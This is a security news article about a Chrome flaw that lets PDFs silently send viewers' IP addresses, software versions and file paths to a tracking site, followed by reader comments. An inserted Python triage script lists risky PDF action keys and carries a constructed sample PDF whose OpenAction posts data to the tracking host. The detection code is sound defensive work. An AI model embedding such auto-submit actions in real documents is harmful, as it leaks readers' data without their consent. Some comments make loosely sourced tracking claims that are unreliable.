
Data-tracking Chrome flaw triggered by viewing PDFs

Researchers have spotted an unusual ‘trackware’ attack triggered by viewing a PDF inside the Chrome browser.

Security company EdgeSpot said it noticed suspicious PDFs, which seem to have been circulating since 2017, sending HTTP POST traffic to the tracking site readnotify.com.

The behaviour only happened when a user viewed a PDF using desktop Google Chrome – when opened in Adobe Reader the PDF’s behaviour returned to normal.

Data sent included the user’s IP address, the Chrome and OS versions, and the full path of the PDF on their computer.
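As an added triage example (my own code, not EdgeSpot’s tooling or anything from the article), the script below scans a PDF for the action keys that let a document reach the network or run script when opened, pulls out any external URLs, and flags the file when both are present. The sample PDF is constructed for the demo: it carries an OpenAction that submits form data by HTTP POST to the tracking host named in the article.

```python
import re
import zlib

# PDF keys that trigger network access or script execution when a document is
# opened. A generic triage heuristic, not EdgeSpot's detection logic.
ACTION_KEYS = (b"/SubmitForm", b"/URI", b"/JavaScript", b"/JS",
               b"/Launch", b"/OpenAction", b"/AA")
URL_RE = re.compile(rb"https?://[^\s()<>\"']+")

def _inflate_streams(data: bytes) -> bytes:
    """Append the decompressed content of every FlateDecode stream so that
    actions hidden inside compressed objects are visible to the scan."""
    out = [data]
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not a Flate stream (or corrupt); skip it
    return b"\n".join(out)

def triage_pdf(data: bytes, allowed_hosts=()) -> dict:
    """Return the action keys and URLs found in a PDF, plus a verdict:
    suspicious when an action key is present AND a URL points outside
    the allowed hosts."""
    text = _inflate_streams(data)
    keys = sorted(k.decode() for k in ACTION_KEYS if k in text)
    urls = sorted({u.decode(errors="replace") for u in URL_RE.findall(text)})
    external = [u for u in urls if not any(h in u for h in allowed_hosts)]
    return {"action_keys": keys, "urls": urls,
            "suspicious": bool(keys and external)}

# Constructed sample (not a real in-the-wild document): a minimal PDF whose
# OpenAction POSTs form data to the tracking host mentioned in the article.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /SubmitForm /F (http://readnotify.com/track) /Flags 4 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    print(triage_pdf(SAMPLE_PDF))
```

Run it over a directory of inbound PDFs and review anything flagged before it is opened in a browser-embedded viewer.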

While not the most fearsome-sounding exploit going, the design is similar to an attack discovered last April (CVE-2018-4993) designed to steal NT LAN Manager (NTLM v2) hashes via the Adobe and Foxit readers.

A second variant of this attack was later discovered by EdgeSpot in November, identified and patched as CVE-2018-15979.

Why would someone be interested in relatively innocuous data?

I’m speculating here, but one possibility might be to test the feasibility of using PDFs in this way in advance of a more significant campaign.

If so, it wasn’t a bad strategy for crawling under the radar in a way that would be harder to pull off when trying the same technique against Adobe Reader. Wrote EdgeSpot:

We decided to release our finding prior to the patch because we think it’s better to give the affected users a chance to be informed/alerted of the potential risk, since the active exploits/samples are in the wild while the patch is not near away.

What to do

Until the issue is patched, EdgeSpot’s recommendation is to view PDFs in an application other than Chrome, or even disconnect a computer from the internet when opening PDFs (Chrome on Android isn’t affected as opening PDFs on mobile devices is done through a separate app).

A possible alternative is to change Chrome’s default option of rendering PDFs in the browser so that instead they download for viewing in a separate application such as Adobe Reader. This is done via Settings > Advanced > Content Settings > PDF documents, ticking the option Download PDF files instead of automatically opening them in Chrome.

Note that if you’re running Reader DC on Windows, it might also have installed a separate Chrome extension for opening PDFs. This doesn’t override Chrome’s PDF download/display settings so can be left enabled.

According to EdgeSpot, Google will fix the vulnerability in “late April”, presumably a reference to Chrome 74, due on 23 April (30 April on Chromebook).

11 Comments

It is not readily apparent (to me) whether a ‘setting’ – such as setting Chrome to download PDFs for viewing instead of automatically opening them within Chrome – is enabled or disabled. There is a button to slide one way or the other, but no way of telling which way is on and which way is off. I think I’ll just go back to using Firefox.

If it is to the right and colored, it is active (on, enabled).
If it is to the left and greyed-out, it is inactive (off, disabled).

Well, well. Another flaw in the system. I believe that I will switch over to Firefox also. Being less and less protected on these devices, but they ALL want more and more of our personal and private information. Bottom line is America needs to get ahold of what’s ours, say “H E double toothpicks” to non-Americans and start looking out for the American people. Veteran Todd

IMHO, it’s a pity Chrome isn’t more like Firefox which makes PDF handling very simple (Options > Applications > PDF, click on drop-down arrow for choices).

Why not just block readnotify.com? And don’t forget to send a complaint to abuse@ripe.net letting them know that their client, readnotify.com is collecting data from a spyware campaign. Who is Jerry Sweeney, anyway?

The only company interested in such “innocuous” data is the one collecting every last sip of info about everyone, um, the author of the browser. Oh yeah, Google reCaptcha apparently takes a pixel-level snapshot of the login pages it’s on, follows mouse clicks, collects 6 months’ worth of Google’s cookies that may be on the computer. Google’s Android OS captures and sells every last footstep and at what exact moment every phone carrier takes. See the excellent NY Times exposé [URI redacted].

Might be time to switch away from the Google product and move at least to the Brave browser version of Chromium..

I’m not going into bat for Google here, but your comments probably need some context:

1. When you visit website X, your browser automatically includes all unexpired cookies previously set by X. The cookies are added to the HTTP headers of the web request. That’s how cookies work. So the fact that a Google web request for a reCAPTCHA page includes Google cookies is neither unusual nor unexpected. The same happens for any website X.

2. The NYT location tracking article you mention specifically deals with apps that you have given “use my location” permission, not with Android (or iOS) itself. You can argue that Google is to blame for making location collection so easy and for taking so long to let you turn location on and off for individual apps after you have installed them, but the article is about apps, primarily on Android but also on iOS.

So the situation is importantly different to what you have suggested.

Cookie collection isn’t Google’s bag alone. It applies everywhere. And location collection isn’t just a trust-Google-or-not thing: you may have dozens of apps collecting the same data and selling it on in dozens of different ways.

Suggestions:

* Turn location off unless you need it. (Saves battery, too!)

* Explicitly log out of websites and online accounts when not using them. 2% security pain for 98% safety gain.

* Delete browser cookies regularly.

These nonsense privacy-invading techniques should be forbidden for good and not only listed and published! They are creating end facts so they can do whatever they like? All users should not only be aware of the threats, but act against them (for this reason I do not allow internet on my Android smartphone at all). If someone wishes to track me he has to do it from the GSM provider (so f*** o** internet, we need an independent Android-like OS where the user has all the control)! Google Mastodon does not have the right to invade privacy as it does, and not only Google does that! Lately I found out that they couple some services with such doings! If you block some you don’t get the desired result, even if the service has nothing in common with particular user interests! This is nasty and should not be allowed at all!

Let’s not leave this discussion with a common misconception about the location setting, especially at a well respected security company.

Turning off the location setting does nothing at all to hide you from Google’s step-by-step tracking and other shady players (and making it available for sale).

“Every moment of every day, mobile phone apps collect detailed location data.” – New York Times article from December. (searchable on this phrase)

And in a Fox News article, Tucker Carlson sent a reporter around to landmark places with two Android phones, both without SIM cards and one in airplane mode. When the person returned, he attached both to a device that collected what was being uploaded to Google servers. The one in airplane mode collected it too and sent it back when turned back on!
Search: “‘It Knows When I Got Out of the Car!’: Tucker’s Special Report on How Google’s Tracking”

Read the articles rather than believe a fiction about your privacy being protected when it isn’t.
Finally, if you install a Google app on the iPhone, yes you are compromising that device, but on Apple, you’re not getting baked in Google apps on the device.
